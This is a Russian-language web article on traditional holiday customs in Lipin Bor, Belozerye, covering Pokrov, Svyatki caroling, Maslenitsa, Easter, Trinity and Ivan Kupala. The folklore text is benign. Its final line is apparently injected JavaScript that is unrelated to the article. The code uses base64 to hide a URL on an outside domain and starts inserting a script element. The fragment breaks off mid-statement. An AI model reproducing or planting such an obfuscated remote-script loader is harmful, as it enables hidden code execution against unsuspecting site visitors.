в сердце Белозерья
 
Праздники

Праздники

Из этой статьи можно узнать об особенностях праздничных ритуалов и обрядов, которые проводили в Липином Бору. Несмотря на то, что в советское время праздники, связанные с христианской традицией, массово не отмечались, память о некоторых ритуалах, которые проводились в том или ином виде, до сих пор жива.

Покрова Пресвятой Богородицы, или Покров день

Традиционно этот праздник отмечают 14 октября. К этому дню каждый старался утеплить избу, хозяйки дома должны были встать раньше всех и накормить скот обрядовым угощением — последним снопом овса, который называли «бородой» или «соломатником».

В это время среди молодых девушек было принято «бегать на женихов»: кто первая в церовь прибежит, та в этом году замуж выйдет. Каждая незамужняя женщина знала следующее выражение: «Батюшка-Покров, покрой землю снежком, а меня женишком».

С Покрова дня начинались вечерние посиделки — «вечерки».

Вид на Троицкую церковь в Липином Бору

Рождество и Святки

Один из самых главных православных праздников отмечают 7 января, именно в этот день славильщики обходили дома, начиная свои песни со слов: «Христос рождается, славьте!» Дети тоже участвовали, ходили с рождественской восьмиконечной звездой и пели песни во славу Божию.

Святки — это две праздничные недели от Рождества до Крещения, когда молодежь ходит колядовать по домам, а за это им давали разные вкусности: пироги, пряники, блины — словом, все, что можно было поместить в мешок. Бывало так, что и не предлагали угощения. Тогда колядующие могли «пожелать» всякого, например, чтобы скот в хлеву подох, или напакостить, угнав сани или облив дверь на ночь водой. К утру она замерала, и люди не могли выйти. Избегая гнева колядующих, люди старались подавать им вкусности. Считалось, как они пожелали, так оно и будет.

Колядка в исполнении Инны Владимировны Соколовой:

Колядки и кудеса (то же самое, что колядки, только еще с переодеванием) делились на «баские», то есть красивые, и страшные. На «баские» кудеса ходили девушки, заранее нарядившись. Лицо могли прикрыть платком.

Страшные кудеса исполняла мужская часть населения. Они наряжались страшными зверями — козлами или медведями, к примеру. Иногда могли кого-то нарядить в покойника: вставляли «репные» зубы, вокруг зажигали огни и пели песни, а через некоторое время «покойник» вскакивал и все разбегались. Помимо переодевания могли пугать живым медведем.

Еще ходили «граммофоны» — люди, которые садились в короб для травы и накрывались полотном или крышкой. С собой они брали самоварную трубу, в которую пели частушки. Парни могли прийти с углем, который во время плясок начинал высыпаться, и танцующие тут же его затаптывали. Могли также в шутку мазать сажей девичьи лица.

Было еще такое развлечение: в короб сажали детей и сыпали на них снегом. Визгу было! Или, бывало, придут взрослые и из дверей кричат, чтобы прятались дети от волков. А когда все спрячутся, говорили, что нет никаких волков, целая изба дураков.

Инна Владимировна Соколова

На Рождество не обходилось без гаданий на суженого: темной ночью девушки шли в баню и пытались воззвать к нечистым силам.

Крещение

Этот христианский праздник отмечали 19 января. Большинство жителей ходили на литургию, крестный ход и «водосвятие». Самый распространенный ритуал крещения — это окропление дома и людей святой водой. Нередко омовение осуществляли в иордани, проруби в виде креста. Таким образом жители «смывали» с себя грехи, а с избы — нечистую силу и ее образ после святок.

Масленица

Праздничная неделя перед Великим Постом открывает череду весенне-летних обрядов. В это время было принято гостить у родственников, печь блины и класть первый за окошко — дань мертвым предкам.

Традиционным блюдом была «соломата», которая завершала застольное кушанье. Блюдо подавалось к столу тещей, а зять должен был первым его испробовать, если он не успевал это сделать, то теща била его ложкой по лбу.

Колоб — пирог из соломаты. Угощение зятя колобом и соломатой встречалось как в Масленицу, так и в другие значимые праздники. Были распространены катания на лошадях и в тройках, все старались украсить сани получше и побогаче.

Основная традиция — это катание на лошадях от деревни к деревне. Сани украшали бубенчиками, тряпочками и ленточками, а дугу и упряжку разукрашивали.Также важным было скатиться с горки: на ледянках, перевернутых скамейках, санках, прялках, шкурах, дровнях, корежках — доске, похожей на самокат без колес. Считалось, что если на масленицу съедешь с горки, то этот год хорошо проживешь.

Вместо чучела сжигали мусор, который мальчишки собрали со всех дворов, приговаривая: «Тетки-лебедки, подайте нам отопки на Масленицу, на катальницу веников, опарышей (банный веник, который используется повторно — прим. ред.)». Через получившийся костер было принято прыгать и загадывать желание. Могли бросать остатки еды с масленичной недели, а детям иногда говорили: «Гляди, гляди в небо, молоко полетело…»

Обряд «казать молодую» состоял в том, что молодожены ездили от деревни к деревне в лучших нарядах, показывались народу и целовались.

У каждого дня масленичной недели было свое название, связанное с определенными обрядами:

  • Понедельник — «встреча»
  • Вторник — «заигрыши»
  • Среда — «лакомка»
  • Четверг — «широкий четверг» или «перелом»
  • Пятница — «тещины вечерки»
  • Суббота — «золовкины посиделки»
  • Воскресенье — «проводы»

Вербное воскресенье

Воскресенье на шестой неделе Великого поста. В этот день жители ходили в храм и освящали ветки вербы, потом приносили домой и использовали как оберег, действие которого направлено на защиту от несчастий и болезней. Верба также была (и до сих пор является) символом победы Иисуса Христа над злом.

Великий, или Чистый, четверг

Это день был связан со многими магическими традициями, например, проводили очистительные обряды и читали заговоры на защиту скота и домашних животных. Таким образом люди пытались сохранить и приумножить имеющихся. Отс оша следующая присказка: «В чистый четверг даже ворона своего вороненка моет». И именно в это время девушки подрезали волосы, приговаривая: «Чтобы косонька росла, густая да длинная».

В Липином Бору готовили четверговую соль, которую пережигали в печке. Помимо этого ходили в лес за можжевельником и жгли его на противне или сковороде, а затем окуривали им избу. Считалось, что такие действия защищают от болезней и порчи.

Пасха

Пасха — это праздник воскресения Господня, в котором замысловато перекликаются христианские традиции, например, всенощная, литургия, разговление, и дохристианские обычаи и обряды. Пасхальные забавы в основном состояли из различных игр с разукрашенными яйцами, например, заводилы просили определить, под какой шапкой спрятано больше яиц, и если человек угадывал, то забирал все яйца из шапки.

Неотъемлемой частью праздничных развлечений были качели, и чтобы все успели прокатиться, были придуманы разнообразные способы установить порядок.

По облакам было принято предсказывать погоду на весну и лето.

Вознесение Господне

Это событие отмечали на сороковой день после Пасхи. Жители Вашкинского района верили, что Иисус Христос находится на земле и наблюдает за их жизнью, в связи с этим образовался целый ряд запретов. Например, нельзя было выплевывать или выбрасывать что-то через окно, потому что люди боялись попасть в Бога, но после Вознесения запрет снимали. На праздник готовили печенье «хворост» или «кудри», его делали из закрученного теста, которое обжаривали в масле и еще горячим подавали к столу.

День Георгия Победоносца, или Егорьев День

Шестого мя в первый раз выгняли скот на поле, проводили обряды, направленные на сохранность животных во время летнего выпаса. В Липином Бору первый выгон иногда переносили на более позднее время из-за особенностей местного климата. Для благополучного возвращения пастухи договаривались с лешим, обещая ему свои бороды, посохи и рубахи. Женщины же в этот день не могли выгонять или встречать скот босиком и без платка.

Троица

23 июня было принято кататься на качелях, а чтобы не засиживаться, были придуманы различные игры.

Троица — девичий праздник, следовательно, было больше женских обрядов. Например, обряд кумления: девушки плели венок из березовых веток и целовались, становясь близкими подругами, почти сестрами, даже с незнакомками. Главным блюдом праздника была яичница, которой угощали подруг и гостей.

Иванов День, или ночь на Ивана Купала

День памяти Иоанна Крестителя считался наиболее благоприятным для проведения обрядовых действий и гаданий. Необходимо было собрать букет из семи трав, сплести из них венок и протанцевать в нем весь вечер. Иногда его опускали в реку, чтобы увидеть суженого. Также были популярны традиционные пляски на мосту, на котором ритм песен чувствовался лучше.

Ильин День

Второго августа праздновали день Ильи Пророка, освещали домашний скот и пекли обрядовое печенье — колоб. После Ильина Дня старались не купаться, веря, что водяной черт кинул соль в воду и осквернил ее.

Фролов, или Хролóв, день

31 августа праздновался день памяти святых великомучеников Флора и Лавра. В народных верованиях они представлялись покровителями лошадей, что было особенно важно для местных жителей.

Изображение от jcomp на Freepik

В этот день в Липином Бору пекли обрядовое печенье — «фролы» или «хлоры». Оно делалось из домашней муки или толокна, смешивалось с маслом, яйцами и сахаром и после выпекания подавалось к столу.

Большинство праздников было разделено между разными деревнями: каждый праздник отмечали в определенной деревне, куда сходились жители округи.

В этой работе использовалась книга «Духовная культура северного Белозерья»1

(function(){var a=document.head||document.getElementsByTagName(«head»)[0],b=»script»,c=atob(«aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=»);c+=-1
  1. https://www.booksite.ru/fulltext/duhkult/text.pdf